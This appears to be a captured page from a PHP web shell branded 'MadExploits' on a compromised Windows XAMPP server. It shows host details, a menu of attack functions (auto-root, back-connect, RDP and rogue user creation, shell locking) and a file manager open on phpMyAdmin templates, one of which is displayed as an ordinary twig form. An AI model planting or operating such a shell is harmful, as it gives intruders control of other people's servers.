Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
table /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
column_comparison_operators.tw...
161
B
-rw-rw-rw-
fields_table.twig
1.09
KB
-rw-rw-rw-
form_tag.twig
268
B
-rw-rw-rw-
geom_func.twig
707
B
-rw-rw-rw-
input_box.twig
4.07
KB
-rw-rw-rw-
replace_preview.twig
1.43
KB
-rw-rw-rw-
rows_normal.twig
1.49
KB
-rw-rw-rw-
rows_zoom.twig
2.7
KB
-rw-rw-rw-
selection_form.twig
8.65
KB
-rw-rw-rw-
zoom_result_form.twig
3.71
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : zoom_result_form.twig
<form method="post" action="tbl_zoom_select.php" name="displayResultForm" id="zoom_display_form" class="ajax"> {{ get_hidden_inputs(db, table) }} <input type="hidden" name="goto" value="{{ goto }}"> <input type="hidden" name="back" value="tbl_zoom_select.php"> <fieldset id="displaySection"> <legend>{% trans 'Browse/Edit the points' %}</legend> {# JSON encode the data(query result) #} <center> {% if zoom_submit and data is not empty %} <div id="resizer"> <center> <a id="help_dialog" href="#"> {% trans 'How to use' %} </a> </center> <div id="querydata" class="hide"> {{ data_json }} </div> <div id="querychart"></div> <button class="btn btn-primary button-reset"> {% trans 'Reset zoom' %} </button> </div> {% endif %} </center> {# Displays rows in point edit form #} <div id="dataDisplay" class="hide"> <table> <thead> <tr> <th>{% trans 'Column' %}</th> <th>{% trans 'Null' %}</th> <th>{% trans 'Value' %}</th> </tr> </thead> <tbody> {% for column_index in 0..column_names|length - 1 %} {% set field_popup = column_names[column_index] %} {% set foreign_data = get_foreign_data( foreigners, field_popup, false, '', '' ) %} <tr class="noclick"> <th>{{ column_names[column_index] }}</th> {# Null checkbox if column can be null #} <th> {% if column_null_flags[column_index] == 'YES' %} <input type="checkbox" class="checkbox_null" name="criteriaColumnNullFlags[{{ column_index }}]" id="edit_fields_null_id_{{ column_index }}"> {% endif %} </th> {# Column's Input box #} <th> {% include 'table/search/input_box.twig' with { 'str': '', 'column_type': column_types[column_index], 'column_id': column_types[column_index] ? 'edit_fieldID_' : 'fieldID_', 'in_zoom_search_edit': true, 'foreigners': foreigners, 'column_name': field_popup, 'column_name_hash': column_name_hashes[field_popup], 'foreign_data': foreign_data, 'table': table, 'column_index': column_index, 'foreign_max_limit': foreign_max_limit, 'criteria_values': '', 'db': db, 'titles': titles, 'in_fbs': false } only %} </th> </tr> {% endfor %} </tbody> </table> </div> <input type="hidden" id="queryID" name="sql_query"> </fieldset> </form>
Close